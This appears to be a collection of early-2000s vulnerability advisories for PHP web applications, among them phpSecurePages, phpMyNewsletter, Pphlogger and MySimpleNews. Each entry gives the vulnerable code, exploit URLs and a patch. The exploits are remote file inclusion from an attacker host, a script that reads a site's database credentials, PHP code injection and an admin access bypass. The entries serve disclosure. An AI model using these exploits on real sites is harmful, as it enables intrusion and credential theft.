fString = doCode(fString, [img],[/img],img src=, border=0)
fString = doCode(fString, [image],[/image],img src=,
border=0)
fString = doCode(fString, [img=right],[/img=right],img align=right
src=, id=right border=0)
fString = doCode(fString, [image=right],[/image=right],img
align=right src=, id=right border=0)
fString = doCode(fString, [img=left],[/img=left],img align=left
src=, id=left border=0)
fString = doCode(fString, [image=left],[/image=left],img align=left
src=, id=left border=0)
by :
fString = doCode(fString, [img]http://,[/img],;img src=http://,;
border=0)
fString = doCode(fString, [image]http://,[/image],;img
src=http://,; border=0)
fString = doCode(fString, [img=right]http://,[/img=right],;img
align=right src=http://,; id=right border=0)
fString = doCode(fString, [image=right]http://,[/image=right],;img
align=right src=http://,; id=right border=0)
fString = doCode(fString, [img=left]http://,[/img=left],;img
align=left src=http://,; id=left border=0)
fString = doCode(fString, [image=left]http://,[/image=left],;img
align=left src=http://,; id=left border=0)
More details in french :
http://www.frog-man.org/tutos/SSGbook.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
Discutez en ligne avec vos amis ! http://messenger.msn.fr
phpSecurePages Killer Protection ( PHP )
1)
Informations :
°°
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file
PHP Code :
°°
-- checklogin.php -
if (!$login) {
// no login available
include($cfgProgDir . interface.php);
exit;
}
if (!$password) {
// no password available
$message = $strNoPassword;
include($cfgProgDir . interface.php);
exit;
}
-- checklogin.php --
Exploit :
°
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/login=1
with
http://[attacker]/interface.php .
Patch :
°°°
Add this :
$cfgProgDir = './';
at the begin of checklogin.php .
More details in french :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
2)
Informations :
°°
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Informations disclosure
Exploit :
°
http://[target]/vars.inc
and
http://[target]/protection.php?mode=displayusername=[LOGIN]password=[PASSWORD]
Patch :
°°°
rename vars.inc vars.inc.php .
In protection.php, replace
require(vars2.inc);
bye
require(vars2.inc.php);
More details in french :
http://www.frog-man.org/tutos/KillerProtection.txt
translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
Affichez, modifiez et partagez gratuitement vos photos en ligne:
http://photos.msn.com/support/worldwide.aspx
phpMyNewsletter
Informations : °° Product : phpMyNewsletter Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problem : include file PHP code : °° /include/customize.php ? $langfile = $l; include $l; ? /include/customize.php Exploit : ° http://[target]/include/customize.php?l=http://[attacker]/code.txttext=Hello%20World With in http://[attacker]/code.txt : ? echo $text; ? or http://[target]/include/customize.php?l=../path/file/to/view Patch : °°° Autor has been alerted and last version (0.7beta1) has been patched. More details - in french : http://www.frog-man.org/tutos/phpMyNewsletter.txt - translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n
Multiple Web Security Holes
I sent this three times to webappsec but without resultats.
I try so on bugtraq, although that is less appropriate.
-
Five products in PHP are vulnerable to various holes.
1) TightAuction
Website : http://www.tightprices.com
Tested Version : 3.0
Problem : BD informations disclosure
Exploit :
?
$victime=http://[target];;
include($victime/config.inc);
print(Infos de la DataBase du site $victime : \n \n);
print(Login : $DB_Username \nPassword : $DB_Password \nServer :
$DB_Database);
?
2) PY-Membres
Website : http://py-scripts.levillage.org/
Tested Version : 3.1
Problem : Access to all accounts
Exploit :
http://[target]/index.php?pymembs=admin
http://[target]/index.php?pymembs=[USER]
Problem :
?
if ($pymembs)
{
$login=$pymembs;
session_start();
session_register('login');
}
else { session_start(); }
[...]
if(!session_is_registered('login'))
{
?
[...]
3) upb PB
Website : http://www.webrc.ca/
Tested Version : 1.0b
Problem : Informations disclosure
Exploit :
http://[target]/db/users.dat
4) MidiCart PHP
Website : http://www.midicart.com
Version : 1
Problems : Informations disclosure, Upload
Exploit :
http://{target}/admin/credit_card_info.php
http://{target}/admin/upload.php
5) Pphlogger
Website : http://www.phpee.com
Tested Versions : 2.0.9, 2.2.1, 2.2.2a
Problem : Include file
Exploit :
http://[target]/showhits.php3?rel_path=http://[attacker]
with
http://[attacker]/main_location.inc
or
http://[attacker]/config.inc.php3
or
http://[attacker]/get_userdata.php3
Problem :
if (!isset($rel_path)) $rel_path=;
include $rel_path.config.inc.php3;
include $rel_path.get_userdata.php3;
For more details patchs :
In french :
http://www.frog-man.org/tutos/5holes10.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII
-
Sorry for my poor english.
frog-m@n
_
Discutez en ligne avec vos amis ! http://messenger.msn.fr
MySimpleNews (PHP)
Informations :
°°
Language : PHP
Tested version : 1
Website : ?
Comment : Very simple code.
a) Writing PHP code in a PHP file and execution of this code.
Problem :
°
- users.php -
?
$fp=fopen(news.php3,a);
fwrite($fp,Posté Par [$LOGIN]\n);
fwrite($fp,Le $DATA\nbr);
fwrite($fp,$MESS\nhr);
fclose($fp);
?
- users.php -
Exploit :
°
http://[target]/users.php?LOGIN=[PHP code]
or
http://[target]/users.php?DATA=[PHP code]
or
http://[target]/users.php?MESS=[PHP code]
Execution : http://[target]/news.php3
b) Recovery of admin's password.
Problem :
°
-- admin.html --
moncode = prompt('MySimpleNews - Administration','');
if (moncode != [PASSWORD])
{
location.href=about:Erreur 403;
}
-- admin.html --
Exploit :
°
view-source:http://[target]/admin.html
c) Deleting news.
Problem :
°
No security in the file.
Exploit :
°
http://[target]/vider.php3
Patch :
°°°
Use of htaccess.
More details in french :
http://www.frog-man.org/tutos/MySimpleNews.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools
frog-m@n
_
Discutez en ligne avec vos amis ! http://messenger.msn.fr
